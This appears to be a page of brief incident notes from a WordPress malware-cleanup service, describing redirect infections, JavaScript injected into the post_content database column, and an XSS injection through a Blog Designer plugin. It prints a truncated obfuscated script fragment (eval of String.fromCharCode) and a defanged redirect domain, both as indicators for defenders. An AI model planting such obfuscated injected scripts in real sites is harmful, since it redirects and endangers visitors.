How to clean injections

This week aprox. 500 websites were found to be infected with redirect malware.
Other malicious URLs found:

Need help? Let us clean your site.

Solution for redirects

Recently we fixed several sites which were redirected to
Other malicious URL:\/black.js
Malicious email address: [email protected]

Repeated SQL Injection: Malicious Javascript in post_content column [ fix ]

Recently I’m dealing with a repeated contamination, having post_content column injected with malicious Javascript code ( wp_posts -> post_content ).
So far only two sites I manage are affected. Both are hosted by ( Paragon Internet Group Limited ).

After a Google search, I found out more sites with the exact same issue – all hosted by tsoHost.

Cross-Site Scripting with Blog Designer Plugin

This time we had to clear out a database injection, caused by a Blog Designer plugin vulnerability. It was fairly simple to to locate the malicious script – it was added by changing “custom_css” value.

Sample code:

script language=javascript>eval(String.fromCharCode(118, 97, 114

Users were directed to: hxxps://stats.garrygudini[.]com/flask.js?t=t& ; domain is now blacklisted by ESET, McAfee and Sucuri Labs.